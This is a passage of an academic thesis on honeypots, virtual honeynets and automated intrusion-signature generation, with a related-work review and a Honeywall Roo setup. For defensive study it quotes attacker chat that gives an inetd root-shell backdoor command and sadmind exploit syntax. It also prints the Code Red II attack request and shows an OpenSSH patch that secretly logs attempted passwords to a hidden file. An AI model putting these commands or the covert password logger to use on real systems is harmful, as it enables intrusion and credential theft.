Honeypots by design allow you to take the initiative; they turn the tables on the bad guys. A Honeypot has no production value and no authorized activity, so any interaction with it is most likely malicious in intent. Honeypots do not solve the security problem, but they provide data and knowledge that help the system administrator to enhance the overall security of his network. This knowledge can be used as input for early warning systems. Over the years researchers have successfully isolated and identified worms and exploits using Honeypots, and the results have been used for signature and rule development. Honeypots are capable of logging far more information than any other available security tool. They give us an insight into attacks and attackers, their skill level, their organization as groups or individuals, and their motives and tactics. Almost every aspect is logged and can be made auditable. Honeypots effectively empower us to study malicious hackers under a microscope. This can be demonstrated with a few examples:

3.6.2.2. Classic Examples

:j@ck :hehe come with yure ip i`ll add u to the new 40 bots
:j@ck :i owned and trojaned 40 servers of linux in 3 hours
:j@ck ::)))))
:j1ll :heh
:j1ll :damn
:j@ck :heh
:j1ll :107 bots now
:j@ck :yup
[1]

Table 2: Honeypot: Classic Examples

3.6.2.3. Discussing Exploits

:_pen :do u have the syntax
:_pen :for
:D1ck :yeah
:_pen :sadmind exploit
:_pen :?
:D1ck :lol
:D1ck :yes
:_pen :what is it
:D1ck :./sparc -h hostname -c command -s sp [-o offset] [-a alignment] [-p]
:_pen : what do i do for -c
:D1ck :heh
:D1ck :u dont know?
:_pen :no
:D1ck :"echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >> /tmp/bob ; /usr/sbin/inetd -s /tmp/bob"
[1]

Table 3: Honeypot: Discussing Exploits

3.6.2.4. Example: Leaves Worm

On June 19, 2001 a sudden rise in scans for the Sub7 Trojan (port 27374) was detected.
An infected emulated Windows Honeypot revealed that a worm was pretending to be a Sub7 client and attempting to infect systems.
Matt Fearnow and the Incidents.org team identified it as the W32/Leaves worm.
The National Infrastructure Protection Center (NIPC) was informed.
A CERT advisory was issued on July 3, 2001. [1]

Table 4: Honeypot: Leaves Worm

3.6.2.5. Example: Code Red II Worm

Ryan Russel at SecurityFocus.com analysed the Code Red II worm (MS IIS indexing exploit).
A typical signature of the Code Red II worm would appear in a web server log as:

GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0

This worm tried to infect other computers at random, along with machines on the same subnet as the infected machine. [1]

Table 5: Honeypot: Code Red II Worm

3.6.2.6. Example: Solaris DTSPCD exploit

A Solaris Honeypot captured a dtspcd exploit, an attack never seen before.
On November 12, 2001, the CERT Coordination Center had released an advisory for the CDE Subprocess Control Service or, more specifically, dtspcd.
The exploit code was isolated and the attack was detected.
This was the first incident in which a Honeypot was used to identify and document an unknown attack. [1]

Table 6: Honeypot: Solaris DTSPCD exploit

3.6.3. Honeynets

A Honeynet is a special kind of high-interaction Honeypot. Honeynets extend the concept of a single Honeypot to a highly controlled network of Honeypots. A Honeynet is a specialized network architecture configured to achieve Data Control, Data Capture and Data Collection. This architecture creates a highly controlled network in which one can control and monitor all kinds of system and network activity. Honeypots are then placed within this network. A basic Honeynet comprises Honeypots placed behind a transparent gateway, the Honeywall.
Acting as a transparent gateway, the Honeywall is undetectable by attackers and serves its purpose by logging all network activity going in or out of the Honeypots.

3.6.3.1. Data Control

Data control is the containment of activity within the Honeynet. It determines the means by which the attacker's activity is restricted so that other systems and resources cannot be damaged or abused through the Honeynet. This demands a great deal of planning, as we need to give the attacker enough freedom to learn from his moves while not allowing our resources (Honeypots and bandwidth) to be used to attack, damage and abuse other hosts on the same or different subnets. The administrators of the Honeynet must carefully study and formulate a policy on the attacker's freedom versus containment, and implement it so as to achieve maximum data control without the Honeypot being discovered or identified as such by the attacker. Various mechanisms are available to achieve data control, such as firewalls, counting outbound connections, intrusion detection systems, intrusion prevention systems and bandwidth restriction. We implement data control mechanisms according to our requirements and the risk thresholds defined.

3.6.3.2. Data Capture

Data capture involves the capturing, monitoring and logging of all threats and attacker activities within the Honeynet. Analysis of this captured data provides an insight into the tools, tactics, techniques and motives of the attackers. The concept is to achieve maximum logging capability at all nodes and hence to log any kind of attacker interaction without the attacker knowing it. This type of stealthy logging is achieved by setting up tools and mechanisms on the Honeypots to log all system activity and by having network logging capability at the Honeywall.
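Of the data control mechanisms listed in 3.6.3.1, counting outbound connections is the easiest to show in code. The sketch below is only an illustration of the idea and not the Honeywall implementation: the class name, the limit of 20 connections and the one-hour window are assumed values chosen for the example. Each Honeypot is allowed a fixed number of outbound connections inside a sliding time window, and further attempts are refused until older ones age out.

```python
from collections import defaultdict, deque


class OutboundLimiter:
    """Allow at most `limit` outbound connections per Honeypot per time window."""

    def __init__(self, limit=20, window_seconds=3600.0):
        # Both defaults are illustrative assumptions, not recommended settings.
        self.limit = limit
        self.window = window_seconds
        # Honeypot IP -> timestamps of the connections that were allowed.
        self._seen = defaultdict(deque)

    def allow(self, honeypot_ip, now):
        """Return True if a new outbound connection at time `now` is permitted."""
        times = self._seen[honeypot_ip]
        # Forget connections that have aged out of the window.
        while times and now - times[0] >= self.window:
            times.popleft()
        if len(times) >= self.limit:
            return False  # threshold reached: block (and ideally raise an alert)
        times.append(now)
        return True
```

A low limit contains a compromised Honeypot quickly but is easier for an attacker to notice, while a high limit gives the attacker more freedom at greater risk to third parties. This is the freedom versus containment trade-off described above.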
Every bit of information is crucial in studying the attacker, whether it is a TCP port scan, a remote or local exploit attempt, a brute force attack, an attack tool downloaded by the hacker, local commands that are run, any communication carried out over encrypted or unencrypted channels (mostly IRC), or any outbound connection attempt made by the attacker. All of this should be logged and sent to a remote location to avoid loss of data through system damage caused by attackers, such as a disk wipe. To prevent the attacker from detecting this activity, data masking techniques such as encryption should be used.

3.6.3.3. Data Collection

Once data is captured, it is securely forwarded to a centralized data collection point. This allows data captured from numerous Honeynet sensors to be centrally collected for analysis and archiving. Implementations vary depending on the requirements of the organization; however, the latest implementations incorporate data collection at the Honeywall gateway.

3.6.3.4. Honeynet Architectures

There are three Honeynet architectures, namely:

Generation I
Generation II
Generation III

3.6.3.4.1. Generation I Architecture

Gen I Honeynets were developed in 1999 by the Honeynet Project. Their purpose was to capture attackers' activity while giving them the feel of a real network. The architecture is simple: a firewall aided by an IDS is placed at the front, with the Honeypots placed behind it. Unfortunately, this makes it detectable by attackers.

Figure 5: Gen I Honeynet Architecture [12]

3.6.3.4.2. Generation II and III Architecture

Gen II Honeynets were first introduced in 2001 and Gen III Honeynets were released at the end of 2004. Gen II Honeynets were designed to address the issues of Gen I Honeynets. Gen II and Gen III Honeynets have the same architecture.
The only difference is that Gen III Honeynets bring significant improvements in deployment and management, along with the addition of a Sebek server built into the Honeywall. A radical change in architecture was brought about by the introduction of a single device that handles both the data control and the data capture mechanisms of the Honeynet, called the IDS Gateway or, to use the marketing terminology, the Honeywall. By making the architecture more “stealthy”, attackers are kept longer and thus more data is captured. There was also a major thrust in improving the Honeypot layer of data capture with the introduction of a new UNIX and Windows based data

Figure 6: Generation III Honeynet Architecture [12]

3.6.3.5. Virtual Honeynet

Virtualization is a technology that allows multiple virtual machines to run on a single physical machine. Each virtual machine can be an independent operating system installation. This is achieved by sharing the physical machine's resources, such as CPU, memory, storage and peripherals, across multiple environments through specialized software. Thus multiple virtual operating systems can run concurrently on a single physical machine. A virtual Honeynet is a solution that makes it possible to run a Honeynet on a single computer. We use the term virtual because each of the operating systems placed in the Honeynet has the 'appearance' of running on its own, independent computer.

3.7. Research Challenge # 1

3.7.1. Architecture and Design Considerations in Virtual Honeynets

3.7.2. Introduction

The Honeynet Project provides documentation on deploying Generation 3 virtual Honeynets; this documentation was developed by the Pakistan Honeynet Project Chapter. The document is a step-by-step How-To for deploying virtual Honeynets using VMware.
It serves as a standard template for anyone who wants to deploy a virtual Honeynet using VMware and Honeywall Roo, and has thus become a de facto reference document: http://www.Honeynet.pk/Honeywall/roo/page2b.htm. During the literature review it was decided to use this document as the standard template for our project's implementation.

The Generation 3 architecture demands three interfaces on the Honeywall: one is used as the management interface while the other two are used as bridged interfaces. In VMware, a bridged interface such as vmnet0 has direct access to the physical interface, so two such interfaces end up bridging the same LAN segment to itself. The requirement, however, was to bridge between two different LAN segments, i.e. the external network segment pointing to the router and the internal network segment on which the Honeypots are placed. It was observed that the Honeynet design suggested by the website had configured both the eth0 and eth1 interfaces as VMware bridged interfaces and eth2 as a VMware host-only interface. This caused a loop in the Honeywall, and the Honeypot LAN segment was bypassed. The problem was reported to the Pakistan Honeynet Project, who accepted it and updated the design on their website.

3.8. Research Challenge # 2

3.8.1. Intrusion Detection

Intrusion detection is the art of detecting malicious activity in a computer related system [76]. Malicious activities and intrusion techniques are interesting from a computer security perspective. Analysis of traffic and events reveals that intrusions differ from the normal behaviour of system usage, and hence anomaly detection techniques are applicable in the intrusion detection domain. Denning [74] classified intrusion detection systems into 1) host based and 2) network based intrusion detection systems. K. Scarfone et al.
[80] classified intrusion detection systems by their detection methodology (signature matching, anomaly detection or stateful protocol analysis), location (on a host, a wired network, or a wireless network) and capability (simple detection or active attack prevention).

3.8.2. Intrusion Detection Problem

Conventional intrusion detection and prevention solutions defend a network's perimeter by using packet inspection, signature detection and real-time blocking. Although these techniques are effective as a static defence, they fail to cope with the dynamic nature of the threats faced today.

Signature matching techniques identify attacks by comparing the contents of packets with a set of signatures or rules that describe known attacks. These techniques can become unreliable against encrypted traffic, self-modifying malware or other evasion techniques. [81]

Stateful protocol analysis techniques match each connection against an existing template that acts as a profile for a given protocol. Any deviation from this profile is immediately reported. The effectiveness of this technique can be seen in areas such as horizontal network scanning or host behaviour profiling. Conversely, attacks that conform to normal protocol behaviour tend to go unnoticed. [81]

3.8.3. Intrusion Detection Signatures

A signature is a pattern or characteristic used for identification; it is used to “describe the characteristic elements of an attack” [52]. Intrusion detection systems identify attacks based on signature matches. These signatures are created after analysing attack traffic data. In the absence of signature writing standards, it has been observed that signatures vary from implementation to implementation [52, 17]. A signature is considered effective if it narrows down the characteristics of the attack and yet is elastic enough to detect variations of the attack [52, 17].
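The two properties of an effective signature, being narrow and being elastic, can be illustrated with a short sketch. The Python below is an assumption-laden example and does not use Snort or Bro rule syntax. The `Signature` class, the signature name and the minimum padding length of 64 characters are all hypothetical. The pattern is modelled on the Code Red II request quoted in 3.6.2.5: it is narrow because it requires the `/default.ida?` request followed by `%u`-encoded data, and elastic because it tolerates a padding run of varying length.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Signature:
    """A named byte pattern (hypothetical structure, for illustration only)."""
    name: str
    pattern: re.Pattern


# Modelled on the Code Red II log entry quoted earlier in this chapter.
# The minimum padding length of 64 is an assumed threshold, not a published value.
CODE_RED_II = Signature(
    name="codered2-ida-overflow",
    pattern=re.compile(rb"GET /default\.ida\?X{64,}(?:%u[0-9a-fA-F]{4})+"),
)


def match_signatures(payload, signatures):
    """Return the names of all signatures whose pattern occurs in the payload."""
    return [s.name for s in signatures if s.pattern.search(payload)]
```

A payload such as `b"GET /default.ida?" + b"X" * 224 + b"%u9090%u6858 HTTP/1.0"` matches, while an ordinary request for `/index.html` does not. Loosening the pattern further catches more variants at the cost of more false positives, which is the tension an automated signature generator has to manage.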
Examples of well known signature-based intrusion detection systems include Bro and Snort [17].

3.8.4. Automated Signature Engineering

Signature generation is a laborious process. It may require hours of analysis until a final effective signature can be produced. This analysis is based on unique characteristics visible within the traffic. Automating this process would be ideal for protecting an enterprise from an imminent attack. A requirement is that the system should intelligently perform traffic analysis to identify unique characteristics that can serve as a key in generating signatures for intrusion detection systems.

Chapter 4: Overview of Related Works

4.1. Honeypots as attack detection and learning tools

Honeypots began as an idea to study and isolate black hat hackers. The requirement to learn about and profile the enemy has always been an interesting area for security researchers. The concept has been around for some time in different forms and implementations until it recently evolved into a well defined and documented solution. This was followed by the development of various commercial products. It is, as yet, not clear who came up with the word “Honeypot” for such projects; however, the core concept has remained the same. Many experts believe that the earliest documents available on the concept of Honeypots were Clifford Stoll's “The Cuckoo's Egg” [2] and Bill Cheswick's "An Evening with Berferd in Which a Cracker Is Lured, Endured, and Studied" [3]. In both works the researchers had a chance to come face to face with an attacker who gained access to their system, and were then presented with various types of data with which to study the attacker’s responses. This was essentially a proof of concept that it was possible to learn from an attacker in such a way that the community can benefit from it. This led to an effort to build better logging mechanisms and tools for studying attacker tactics.
In 1999, Lance Spitzner, the founder of The Honeynet Project [4], started work in the area of Honeypots. In a very short span of time the Honeynet Project contributed a series of publications focused on the definition, development, architecture and organization of Honeypots. Researchers in the Honeynet Project have published their findings and experiences with their Honeypots over a number of years. The most notable book in this regard is “Honeypots: Tracking Hackers” [1]. This book gives a deep insight into Honeypots and is the first compilation of its kind among Honeypot based books. This was followed by “Know Your Enemy: Learning about Security Threats”, published by the Honeynet Project in 2004. The era of virtualization had its impact on security and Honeypots. The community responded, notably through the efforts of Niels Provos (founder of honeyd) and Thorsten Holz in their book “Virtual Honeypots: From Botnet Tracking to Intrusion Detection” in 2007 [6]. Papers on Virtual Honeynets were published by the Honeynet Project in early 2003, whilst the year 2004 marked the start of a new type of Honeypot known as the client Honeypot. Kathy Wang's “honeyClient” became the first publicly available client Honeypot tool. Generation III Honeynets also emerged in 2004-2005, and Honeywall CDROM version 2, “Roo” [22], became the first publicly available tool based on Generation III technology.

The road onwards has seen many improvements and enhancements to the functional components of a Honeynet, especially with respect to the tools for data analysis. There has been a significant shift of focus from Honeynets to client Honeypots and then towards virtual Honeynets. A significant amount of work is being carried out on client Honeypot based developments and on enhancing the capabilities of existing Honeynet technologies. Our system will incorporate existing Honeynet technology and will be set up in a virtual environment using VMware ESX server.
This will give us another dimension of valuable data on the state of the Honeypot while it is under attack.

4.2. Automated Signature Engineering using Honeypots

The existence of complex self-similar patterns in internet traffic was first revealed in work done by Leland et al. [73]. Multiple invariant substrings must often be present in all variants of a worm payload [54]. The substrings correspond to return addresses, protocol framing, and poorly obfuscated code [53]. Generating a short, single-substring signature for all worm instances can result in high false positive rates [54].

Systems based on pattern-based analysis extract common byte patterns across suspicious flows to generate signatures for novel internet worms. Examples of such systems include EarlyBird [56], Honeycomb [53], and Autograph [55]. A single signature is used to match all worm instances based on unique substrings in the payload. These substrings are considered invariant across worm connections [54]. Such systems may suffer from relatively high false positive and false negative rates [54].

Signatures for polymorphic worms can be classified under two main categories [53, 54, 55, 56]:
1. Content-based: Detect similarity in different instances of byte sequences to characterize a given worm.
2. Behaviour-based: Characterization by perceiving the semantics of byte sequences.
We would like to incorporate both approaches in our research.

Honeypots provide us with insight for intrusion and attack analysis. Pouget et al. [65] analysed traffic in Honeypots to identify root causes of frequent processes. Observed traffic was organized based on the port sequence. This data was then clustered using association rules mining [64]. “Phrase distance” was then applied to the result. Levin et al. explained the use of Honeypots to extract particulars of a worm that can be analysed to generate signatures [57].
Honeycomb [52] was one of the first implementations of an automated signature generator. It was implemented as a Honeyd [58] plug-in. Honeycomb applies the longest common substring (LCS) algorithm to connection pairs to determine common byte sequences. It generates signatures consisting of a single, long substring of a worm’s payload, which limits its ability to detect all instances of a polymorphic worm.

Julisch [66] defined a method that clustered intrusion alarms for the purpose of discovering the root cause of an alarm. The system then generated a generalized alarm for each cluster.

Kim et al. [55] described the Autograph system, a content-based filtering system for automated signature generation to detect worms. Autograph is deployed at a DMZ whose traffic includes benign flows. Suspicious TCP flows are identified by content matching and are then forwarded as input to content-based payload partitioning (COPP), an algorithm based on Rabin fingerprints. Repeated byte sequences are located by partitioning the payload into content blocks. Autograph also generates one long contiguous substring of a worm’s payload as a signature. Thus variations in a worm cannot be detected.

S. Singh et al. [56] presented the Earlybird system. Earlybird tries to identify new worms by exploiting common characteristics among them. The system measures content prevalence in packets at the DMZ by counting the diverse sources and destinations associated with high frequency strings in the payload. The system distinguishes benign content from epidemic content. Earlybird also generates a single, contiguous substring of a worm’s payload as a signature. These signatures are not effective in matching all polymorphic worm instances.

Content-based systems like Honeycyber, Polygraph, Hamsa and LISABETH [62, 59, 60, 61] generate automated signatures for polymorphic worms.
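The longest common substring step that Honeycomb applies to connection pairs, described earlier in this section, can be illustrated with a minimal sketch. The function name and the two payloads below are hypothetical, and the simple dynamic-programming approach is chosen for readability; it is not claimed to be the data structure or implementation that Honeycomb itself uses.

```python
def longest_common_substring(a: bytes, b: bytes) -> bytes:
    """Return one longest contiguous byte run shared by a and b.

    Simple dynamic programming, O(len(a) * len(b)) time.
    """
    best_len = 0
    best_end = 0  # exclusive end index of the best match inside a
    prev = [0] * (len(b) + 1)
    for i in range(1, len(a) + 1):
        curr = [0] * (len(b) + 1)
        for j in range(1, len(b) + 1):
            if a[i - 1] == b[j - 1]:
                # Extend the common run that ended at a[i-2], b[j-2].
                curr[j] = prev[j - 1] + 1
                if curr[j] > best_len:
                    best_len = curr[j]
                    best_end = i
        prev = curr
    return a[best_end - best_len:best_end]


# Two made-up payloads that share an invariant byte sequence.
payload_a = b"AAAA\x90\x90\x90\x90/bin/shBBBB"
payload_b = b"CCCCCC\x90\x90\x90\x90/bin/shDD"
candidate_signature = longest_common_substring(payload_a, payload_b)
```

A single substring obtained this way is exactly the kind of signature that the text above notes is too rigid for polymorphic worms, which is why later systems look for several shorter invariant substrings instead.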
These content-based systems (Honeycyber, Polygraph, Hamsa and LISABETH) have the following in common. They rely on the observation that several distinct substrings are often present in all variants of a polymorphic worm payload, even if the payload changes in every infection. All of these systems capture packets from a router, so they may observe multiple polymorphic worms, each addressing a different vulnerability. This makes it difficult to find distinct contents shared amongst polymorphic worms. One instance of a worm is sent out, which later on attempts to change its payload on every instance of infection. In order to capture all polymorphic worm instances, we need to observe the polymorphic worm while it interacts with hosts.

Honeycyber [62] utilizes a “Double-Honeynet” method to detect polymorphic worms and collect all their instances. It is based on an intrusion detection policy of waiting for attackers to attack the network [62]. The approach is to use high interaction Honeypots as virtual machines for both inbound and outbound Honeypots. The proposed method makes it possible to capture all worm instances and then forward these instances to the Signature Generator, which generates signatures using a particular algorithm.

Sommer and Paxson [63] proposed adding connection level context to signatures to reduce false positives. Christodorescu et al. [67] defined a semantics aware methodology to detect malicious traits in x86 binaries. The algorithm used incorporates the semantics of the x86 instructions that are executed. Yegneswaran et al. [70] described the Nemean system. This system incorporates protocol semantics into the signature generation algorithm. This gives the system a new dimension and makes it capable of handling a broader class of attacks, giving it wider coverage for dealing with polymorphic worms.

In “An Automated Signature-Based Approach against Polymorphic Internet Worms”, Yong Tang and Shigang Chen [71] defined a system to detect new worms and generate automated signatures.
This system implemented “double-Honeypots” to capture worm payloads. The arrangement proposed a high-interaction Honeypot for inbound traffic and a low-interaction Honeypot for outbound traffic. Being a low-interaction Honeypot, the outbound component could not make outbound connections, thus limiting its capability to capture worm payloads.

In “Automated Web Patrol with Strider HoneyMonkeys”, Yi-Min Wang et al. [72] developed an automated web patrol system called “HoneyMonkeys”. This system automatically identifies and monitors malicious web sites that attack their victims with drive-by downloads. Such websites install malware programs without the user’s consent by exploiting browser vulnerabilities. Their approach was to create a system that actively mimics the actions of a user browsing the Web. Special programs called “monkey programs” drive a browser in a manner similar to that of a human user. The browsers can be configured to run with fully updated software or without specific updates in order to identify exploit sites. The attacks with the greatest impact are then analyzed. On detection of a zero-day exploit, HoneyMonkey reports all URLs to the Microsoft Security Response Center. The information is then shared with the enforcement team and the groups owning the software. The vulnerability is then thoroughly investigated to determine the most appropriate course of action. With its intrusion prevention oriented policy, HoneyMonkey makes an effort to fight back [62]. The HoneyMonkey system is limited to web based technologies and protocols only.

4.3. Anomaly Detection

Anomaly detection is the art of finding patterns in data that do not conform to expected behaviour or models [75]. The approach is to build models of normal data and detect deviations in observed data.
Denning [74] proposed the application of anomaly detection to intrusion detection and computer security in 1987. Since then it has been an active area of research. Anomaly detectors build models of acceptable behaviour and then raise an alarm if any deviations from the model are observed. Anomaly detection techniques for detecting port scans have been explored in [68, 69]. Experience has revealed that balancing generality and specificity is extraordinarily difficult in anomaly detection systems, resulting in a high false-positive rate.

The architecture of a generic anomaly detection system comprises three main components: (1) the sensor subsystem, (2) the modelling subsystem and (3) the detection subsystem [78].

4.4. Network Behavioural Analysis (NBA)

Behaviour refers to the actions or reactions of an object or organism, usually in relation to the environment. Behaviour can be conscious or subconscious, overt or covert, and voluntary or involuntary [77]. A behavioural model is a representation of characteristics that are consistent with the observed object or organism. M. Rehák et al. [81] define network behavioural analysis as: “An intrusion detection technique that uses the patterns in network-traffic structures and properties to identify possible attacks and technical problems with minimal impact on user data privacy. The analysis is not based on content of the transferred information”. Shu Yun et al. [79] define NBA as an industry buzz word for a network anomaly detection system. NBA solutions watch what is happening inside the network, aggregating data from many points to support offline analysis. NBA systems create profiles or benchmarks for normal traffic. These profiles are then compared with the monitored network traffic. Alarms are generated when the system detects unknown, new or unusual patterns that might indicate the presence of a threat. Such patterns can be trends in bandwidth and protocol use.
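The profile-and-compare idea described above can be sketched in a few lines. This is only an illustration under stated assumptions: the function names, the bandwidth samples and the three-standard-deviation threshold are all hypothetical, and real NBA products build far richer profiles than a single mean and standard deviation.

```python
from statistics import mean, stdev


def build_profile(baseline_samples):
    """Summarise normal traffic as (mean, sample standard deviation)."""
    return mean(baseline_samples), stdev(baseline_samples)


def is_anomalous(value, profile, threshold=3.0):
    """Flag a measurement that deviates from the profile by more than
    `threshold` standard deviations (an assumed, tunable cut-off)."""
    mu, sigma = profile
    if sigma == 0:
        return value != mu
    return abs(value - mu) / sigma > threshold


# Hypothetical bandwidth samples (kbit/s) observed during normal operation.
baseline_kbps = [100, 104, 98, 101, 97, 103, 99, 102]
profile = build_profile(baseline_kbps)

normal_reading = is_anomalous(105, profile)    # small deviation
unusual_reading = is_anomalous(400, profile)   # large deviation
```

The threshold is where the balance between generality and specificity shows up in practice: a lower value catches more deviations but raises more false alarms.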
Network behaviour analysis is particularly good for spotting new malware and zero day exploits. NBA tools can greatly help a network administrator minimize the labour and time involved in locating and resolving problems. Today it is being used as an enhancement to the protection provided by the network's firewall, intrusion detection system, antivirus software and spyware-detection program.

Chapter 5: Research Questions

The research questions for our studies can be grouped into two main areas. The first area relates to the setup of an environment to detect intrusions and learn from the intruders. The second area is concerned with extracting sufficient information from the system to be able to propose a proactive response in the form of a signature.

Part I:
Question # 1: How to collect information on the attackers? Their tools? Their tactics? Their techniques? Their motives? Is it possible to stay one step ahead of them?
Question # 2: Which technology can be used to effectively and efficiently carry out detection in depth?
Question # 3: Can we virtualise such an environment to save cost and yet be able to maintain stealth from the attackers?

Part II:
Question # 1: How to intelligently and effectively identify an intrusion and extract enough information from it to be able to generate automated signatures effectively?
Question # 2: Can we identify and foretell intrusions by observing traffic patterns and payload content?
Question # 3: Can we identify and foretell intrusions by observing patterns in system events?
Question # 4: How to correlate system and network events to recreate a valid snapshot of the attack?
Question # 5: How to test the effectiveness of the technique and its result?

Chapter 6: Methodology Review

In order to address these research questions a series of research methods will be adopted. In this section, details of the methodologies adopted will be described.

6.1. Proposed system for Virtual Honeynet Architecture Problem

6.1.2.
Methodology and Discussion

Figure 7: Proposed Virtual Honeynet Architecture

Similar problems were faced and discussed by people from all over the globe who wanted to implement a similar virtual Honeynet project. We shared and discussed our findings with the community on the Honeywall project mailing list. After the necessary testing a design was drawn up and followed for the project implementation. After successful results it was decided to publish the improved design. This design proposes three interfaces for the Honeywall such that:
1. vmnet0 is a VMware bridge interface pointing towards the router (as shown in the figure above).
2. vmnet1 is a VMware host-only interface leading to the internal LAN segment where the Honeypot is kept (as shown in the figure above).
3. vmnet2 is a VMware bridge interface that is firewalled and accessible for remote management purposes (SSH and Walleye).
Interfaces 1 and 2 are picked up by Honeywall Roo as eth0 and eth1 and are used for bridging. Interface 3 is used for remote management. As shown in Figure 8, the red boxes indicate the publicly assigned IP addresses: in this case the host machine's eth0 interface, the virtual machine's Honeywall management interface (i.e. interface 3) and the Honeypots (one, two or many). The remote management interface can be routed to an internal subnet; for our implementation we assigned it a public IP address but restricted access to specific IP addresses (via Roo), and then only via SSH port forwarding into that subnet. This project was implemented successfully with one physical gigabit Ethernet interface. Another physical interface could have been used by binding it to the remote management interface.

6.1.3. Ubuntu as Honeypot

Ubuntu 8.04 was used as a Linux based Honeypot for our implementation. The concept was to set up an up-to-date Ubuntu server, configured with commonly used services such as SSH, FTP, Apache, MySQL and PHP, and study attacks directed towards them on the internet.
Ubuntu, being the most widely used Linux desktop, can prove to be a good platform to study zero day exploits. It also becomes a candidate for malware collection and a source for learning about hacker tools being used on the internet. Ubuntu was successfully deployed as a virtual machine and set up in our Honeynet with a host-only virtual Ethernet connection. The Honeypot was made sweeter, i.e. a more interesting target for the attacker, by setting up all services with default settings. For example, SSH allowed password based connectivity from any IP on the default port 22, the users created were given privileges to install and run applications, the Apache index.html page was made remotely accessible with default errors and banners, the MySQL default port 3306 was accessible, and outbound connections were allowed but limited.

In order to obtain maximum information on the attacker's interaction with the Honeypot, special measures were taken. These include patching system services to log information that is not logged by default. OpenSSH logs basic information on all SSH login attempts. This includes the date and time stamp, the IP address of the attacker, the username tried by the attacker and whether the attempt was successful or not. The passwords tried are not logged, since a security breach in the system log directory could put at stake the accounts of all users who connected via SSH. Ethical issues also demand that user passwords are not logged. This is one of the reasons OpenSSH does not log user passwords by default. We discovered that it was possible to add support for logging passwords alongside the other information, appending them to a file, simply by patching the “auth-passwd.c” source file from the OpenSSH sources. Hence adding 5-10 lines of C file-handling code and recompiling the OpenSSH sources resulted in a customized OpenSSH daemon capable of logging passwords.
    result = sys_auth_passwd(authctxt, password);
    if (authctxt->force_pwchange)
        disable_forwarding();
+   /* Honeypot patch: append each failed password attempt to a hidden log. */
+   if (!sys_auth_passwd(authctxt, password))
+   {
+       FILE *cookiemonster;
+       cookiemonster = fopen("/var/log/.hplaser7l/hpsshd_logged", "a");
+       if (cookiemonster != NULL)
+       {
+           chmod("/var/log/.hplaser7l/hpsshd_logged", 0600);
+           /* Record format: timestamp:user:password:remote IP */
+           fprintf(cookiemonster, "%ld:%.100s:%.100s:%.200s\n", (long)time(NULL), authctxt->user, password, get_remote_ipaddr());
+           fclose(cookiemonster);
+       }
+   }
    return (result && ok);
}

Table 7: SSH patch for the Honeypot

In view of the security risk that such a log file can pose for an organization, it is best to hide it deep within the system. For our implementation we hid it as “/var/log/.hplaser7l/hpsshd_logged”. Different locations can be used within the system depending on the implemented security policy. Analysis of this SSH log file gave us insight into the efficiency of the attack tools used for brute force attacks, and into the hackers' distributed attack techniques.

SSH logs suggesting a brute force attack and successful exploitation by a hacker:

uid=0 euid=0 tty=ssh ruser= rhost=209-173-99-82.bluetone.cz
Sep 21 10:59:54 paul-desktop sshd[10764]: Failed password for invalid user tibi from 82.99.173.209 port 42134 ssh2
Sep 21 10:59:54 paul-desktop sshd[10772]: Failed password for invalid user katy from 82.99.173.209 port 42292 ssh2
Sep 21 10:59:55 paul-desktop sshd[10769]: Failed password for root from 82.99.173.209 port 42237 ssh2
Sep 21 10:59:55 paul-desktop sshd[10777]: Invalid user scotch from 82.99.173.209
(…)
Sep 21 10:59:56 paul-desktop sshd[10776]: Failed password for man from 82.99.173.209 port 42760 ssh2
Sep 21 10:59:56 paul-desktop sshd[10782]: Invalid user tibo from 82.99.173.209
Sep 21 10:59:57 paul-desktop sshd[10784]: Accepted password for john from 82.99.173.209 port 43246 ssh2
Sep 21 10:59:57 paul-desktop sshd[10796]: pam_unix(sshd:session): session opened for user john by (uid=0)

Table 8: SSH Logs

6.1.4.
VMware as Virtualization Software

Virtualization software has greatly helped organizations reduce the expenses and total cost of ownership (TCO) of their IT infrastructure. This is achieved by setting up an entire farm of enterprise servers as virtual machines on a single physical machine. Organizations are now developing their own virtualization software and solutions, many of which are free and open source. A few notable names that we considered for deployment include: VMware, User-Mode Linux, VirtualBox, Xen, Qemu, Lguest and Linux-Vserver. We selected and used VMware Server as the virtualization solution for our project. Later implementations were shifted to VMware ESX server 4.0.

6.1.5. Honeywall Roo

Honeywall CDROM is a bootable CDROM for installing, deploying and maintaining a Honeynet. The Honeynet Project has developed two versions of the Honeywall CDROM:
- Honeywall Eeyore: Released in May 2003, based on the Gen II architecture. (Not supported anymore.)
- Honeywall Roo: Released in May 2005, based on the Gen III architecture. (Current version 1.4.)

Honeywall serves as a transparent gateway for the Honeynet. It is this gateway that has to perform the data capture, data control, data collection and data analysis functions in order to ensure successful operation of a Honeynet. Being a transparent gateway, this node is completely undetectable by attackers when they are interacting with the Honeypots. The purpose of the Honeywall CDROM is to automate the installation and maintenance of a Honeynet and provide data analysis support for all activity within the Honeynet. Deploying Honeynets was a strenuous task, as it involved advanced configuration and integration of security tools. There was no standard Honeynet development till 1999. Many small groups had their own implementation of Honeynets.
The Honeynet Project has done remarkably well by developing a complete Honeywall distribution on a CDROM that is deployed as an operating system on disk, and has thus made Honeynets easy to deploy and manage. Balas and Viecco [16] have given a generalized data collection and fusion diagram for a Generation III Honeywall. Extending their work further, we propose an extended diagram of the Honeywall Roo [22] logical design in Figure 8.

Figure 8: Roo Logical Design

Honeywall has evolved over the years. The previous version, Eeyore, had limited features and control. Roo, the advanced version, has vastly improved hardware support, administration capabilities, and data analysis functionality. Thus the system is now moving towards giving the administrator more flexibility and control over the operating system. Honeywall Roo incorporates many well known security tools, such as:
- Snort: Sniffer, IDS.
- Snort_inline: Sniffer, IPS.
- Hflow2: A data coalescing tool for Honeynet data analysis.
- P0f: Passive OS fingerprinting tool.
- Tcpdump: View packet headers.
- Sebek: Data capture tool.
